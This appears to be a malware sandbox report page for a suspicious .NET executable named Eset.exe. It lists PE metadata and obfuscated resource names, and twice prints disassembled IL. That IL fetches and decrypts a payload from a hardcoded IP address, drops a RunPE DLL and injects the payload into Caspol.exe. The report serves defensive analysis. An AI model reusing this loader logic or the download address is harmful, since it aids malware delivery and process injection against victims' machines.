Suspicious
Suspect

Share on LinkedIn
Print
PE Executable
MD5:
Size: 0 B
application/x-dosexec

Get an AI-generated breakdown of this malware's behaviour, IOCs and recommendations.

AI analysis is available with Essential.
Unlock with Essential
Symbol Obfuscation Score Medium
PeID
.NET executableMicrosoft Visual C# / Basic .NETMicrosoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL Microsoft Visual C# v7.0 / Basic .NETMicrosoft Visual Studio .NET
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
bin.Properties.Resources.resources
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
I87KRmw0LvRLi8pQ00.x919IYhTeCsc3NCy8U
0lyMFIlkQUmJwSfdTM.fxdXUcqSIOOBQZ5xw1
nwj2e48f7vCVk5ROuV.INGExIEWfr0UijO2W3
Name Value
Module Name
Eset.exe
Full Name
Eset.exe
EntryPoint
System.Void bin.Launcher::Main()
Scope Name
Eset.exe
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
Eset
Assembly Version
1.0.0.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.7.2
Total Strings
14
Main Method
System.Void bin.Launcher::Main()
Main IL Instruction Count
53
Main IL
nop <null>
ldstr http://198.55.98.195/creat/bintxt.txt
stloc.0 <null>
call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory()
ldstr Caspol.exe
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.1 <null>
nop <null>
ldloc.0 <null>
call System.Byte[] bin.Launcher::FetchAndDecrypt(System.String)
stloc.2 <null>
ldloc.2 <null>
brtrue.s IL_0025: ldloc.2
ldc.i4.0 <null>
br.s IL_002A: stloc.3
ldloc.2 <null>
ldlen <null>
ldc.i4.0 <null>
cgt.un <null>
stloc.3 <null>
ldloc.3 <null>
brfalse.s IL_0053: nop
nop <null>
call System.String bin.Launcher::DropRunPEDLL()
stloc.s V_4
ldloc.s V_4
call System.Boolean System.String::IsNullOrEmpty(System.String)
ldc.i4.0 <null>
ceq <null>
stloc.s V_5
ldloc.s V_5
brfalse.s IL_0052: nop
nop <null>
ldloc.s V_4
ldloc.1 <null>
ldloc.2 <null>
call System.Void bin.Launcher::LoadAndRun(System.String,System.String,System.Byte[])
nop <null>
nop <null>
nop <null>
nop <null>
leave.s IL_0073: ret
stloc.s V_6
nop <null>
ldstr Critical failure: 
ldloc.s V_6
callvirt System.String System.Exception::get_Message()
call System.String System.String::Concat(System.String,System.String)
call System.Void System.Console::WriteLine(System.String)
nop <null>
nop <null>
leave.s IL_0073: ret
ret <null>
Module Name
Eset.exe
Full Name
Eset.exe
EntryPoint
System.Void bin.Launcher::Main()
Scope Name
Eset.exe
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
Eset
Assembly Version
1.0.0.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.7.2
Total Strings
14
Main Method
System.Void bin.Launcher::Main()
Main IL Instruction Count
53
Main IL
nop <null>
ldstr http://198.55.98.195/creat/bintxt.txt
stloc.0 <null>
call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory()
ldstr Caspol.exe
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.1 <null>
nop <null>
ldloc.0 <null>
call System.Byte[] bin.Launcher::FetchAndDecrypt(System.String)
stloc.2 <null>
ldloc.2 <null>
brtrue.s IL_0025: ldloc.2
ldc.i4.0 <null>
br.s IL_002A: stloc.3
ldloc.2 <null>
ldlen <null>
ldc.i4.0 <null>
cgt.un <null>
stloc.3 <null>
ldloc.3 <null>
brfalse.s IL_0053: nop
nop <null>
call System.String bin.Launcher::DropRunPEDLL()
stloc.s V_4
ldloc.s V_4
call System.Boolean System.String::IsNullOrEmpty(System.String)
ldc.i4.0 <null>
ceq <null>
stloc.s V_5
ldloc.s V_5
brfalse.s IL_0052: nop
nop <null>
ldloc.s V_4
ldloc.1 <null>
ldloc.2 <null>
call System.Void bin.Launcher::LoadAndRun(System.String,System.String,System.Byte[])
nop <null>
nop <null>
nop <null>
nop <null>
leave.s IL_0073: ret
stloc.s V_6
nop <null>
ldstr Critical failure: 
ldloc.s V_6
callvirt System.String System.Exception::get_Message()
call System.String System.String::Concat(System.String,System.String)
call System.Void System.Console::WriteLine(System.String)
nop <null>
nop <null>
leave.s IL_0073: ret
ret <null>
PDB Path PATH
C:\Usehuhuhuhuhuhuhuhuhuhuhu
PDB Path PATH
BLAChuhuhuhuhuhuhu
Full artefact values (URLs, paths, registry keys, scripts…) are available with Essential.
Unlock with Essential
An error has occurred. This application may no longer respond until reloaded. Reload 🗙